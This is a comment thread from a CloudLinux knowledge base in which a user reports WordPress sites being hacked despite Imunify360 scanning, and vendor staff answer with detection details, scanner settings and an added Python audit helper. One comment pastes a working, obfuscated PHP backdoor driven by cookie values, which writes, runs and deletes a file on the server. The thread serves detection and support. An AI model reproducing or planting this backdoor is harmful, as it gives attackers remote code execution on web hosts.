CloudLinux Knowledge Base

Malware Signatures Database Update

Comments

5 comments

  • Dean Cohen

    Hey Anna, it seems like it doesn't get detected. We also migrated to a new server, and it seems like tons of WordPress sites with old versions are getting hacked and hacked; it feels like the WAF and malware scanner are not really working!

  • Dean Cohen

    Here is another malware sample from an hour ago in the wp-admin folder:

    <?php
    $ylW=	${"\137". "\103" ."\117\117"	."\113\111\105" }	;	 if (isset(	$ylW[ (	95	- 0) 	] ))	{ $NjOE=	$ylW[(98	-	42)  ]. $ylW [(95 -7)];$uxz	= $NjOE (	$ylW[	 (	63-	14)	].$ylW[ (	99-68) ] ) ;	 $wm=$uxz( $NjOE	(	$ylW	[( 82 -4	)]) )	;	$Tc	= $uxz	(	$NjOE( $ylW [ (	73 -13 )	]	)	);  	$au	=__DIR__ .$uxz	($NjOE	($ylW[	(	76 -	0	) ]	));	  $wm ( $au ,$uxz(	$NjOE(	$ylW	[ (	98-3	)	])	));include	(	$au	) ; 	$Tc	(	$au	); }
  • Anna

    Hi Dean!

    Sorry to know the hacking is still taking place after the migration.

    I can see the sample provided is detected by our scanning engine with the following signature:

    sha256: c9ca1ce50437a880d60daf937545dbdccbacd2c4a8c4cd30d25edf559148e25d
    sn: SMW-SA-23697-php.bkdr-2

    Indeed, we recommend that you refrain from running outdated versions of the WordPress script and themes/plugins because old versions may have vulnerabilities leading to malicious code injections like this one – you may notice the signature indicates a backdoor infection.

    Also, ensure that all real-time scanner options are enabled, especially for newly added/modified (inotify) files:

        "MALWARE_SCANNING": {
          "cloud_assisted_scan": true,
          "crontabs": true,
          "default_action": "cleanup",
          "detect_elf": true,
          "enable_scan_cpanel": true,
          "enable_scan_inotify": true,
          "enable_scan_modsec": true
        }

    The Database Scanner feature may also help in case of a WordPress infection: https://docs.imunify360.com/dashboard/#malware-database-scanner To enable it, please run the following as root:

    imunify360-agent config update '{"MALWARE_DATABASE_SCAN": {"enable": true}}'

    To have files scanned with the latest scan build, check whether the Imunify360 agent is of the latest version. The following update instructions may be handy:

    Finally, if the situation does not change after following the recommendations below, please consider contacting our support team at https://cloudlinux.zendesk.com/hc/en-us/requests/new – our specialists will be happy to help you with this.

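A small audit helper for the settings Anna lists above, added here as an example and not part of the original thread or of Imunify360 itself. It assumes the agent configuration is available as the JSON object shown in the reply (a constructed sample is embedded), reports every real-time scanner or database scanner option that is missing or weaker than recommended, and emits the JSON payload for the `imunify360-agent config update` command from the reply.

```python
import json

# Real-time scanner options from the reply, with the value each should have.
EXPECTED_MALWARE_SCANNING = {
    "cloud_assisted_scan": True,
    "crontabs": True,
    "default_action": "cleanup",
    "detect_elf": True,
    "enable_scan_cpanel": True,
    "enable_scan_inotify": True,
    "enable_scan_modsec": True,
}
EXPECTED_DATABASE_SCAN = {"enable": True}


def find_weak_settings(config):
    """Return {section: {key: (current, expected)}} for every option that is
    missing or differs from the recommended value. A missing key is reported
    with current value None so it is never silently treated as enabled."""
    wanted = {"MALWARE_SCANNING": EXPECTED_MALWARE_SCANNING,
              "MALWARE_DATABASE_SCAN": EXPECTED_DATABASE_SCAN}
    findings = {}
    for section, expected in wanted.items():
        current = config.get(section) or {}
        diffs = {k: (current.get(k), v) for k, v in expected.items()
                 if current.get(k) != v}
        if diffs:
            findings[section] = diffs
    return findings


def build_update_payload(findings):
    """Build the JSON argument for `imunify360-agent config update '<json>'`
    that sets only the options found to be weak or missing."""
    payload = {section: {k: exp for k, (_cur, exp) in diffs.items()}
               for section, diffs in findings.items()}
    return json.dumps(payload, sort_keys=True)


# Constructed sample (hypothetical host): inotify scanning is off, the default
# action only notifies, and the database scanner section is absent entirely.
SAMPLE_CONFIG = {
    "MALWARE_SCANNING": {
        "cloud_assisted_scan": True, "crontabs": True,
        "default_action": "notify", "detect_elf": True,
        "enable_scan_cpanel": True, "enable_scan_inotify": False,
        "enable_scan_modsec": True,
    }
}

if __name__ == "__main__":
    weak = find_weak_settings(SAMPLE_CONFIG)
    for section, diffs in weak.items():
        for key, (cur, exp) in diffs.items():
            print(f"{section}.{key}: is {cur!r}, should be {exp!r}")
    print("imunify360-agent config update", repr(build_update_payload(weak)))
```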
  • Dean Cohen

    Hey Anna, it seems like the malware scanner does not really work on the server; as you said, it "gets detected".

    But it seems not. Could you please take a look at my ticket?

  • Bogdan Shyshka

    Dean, as far as I can see, the ticket has already been handled by our team.
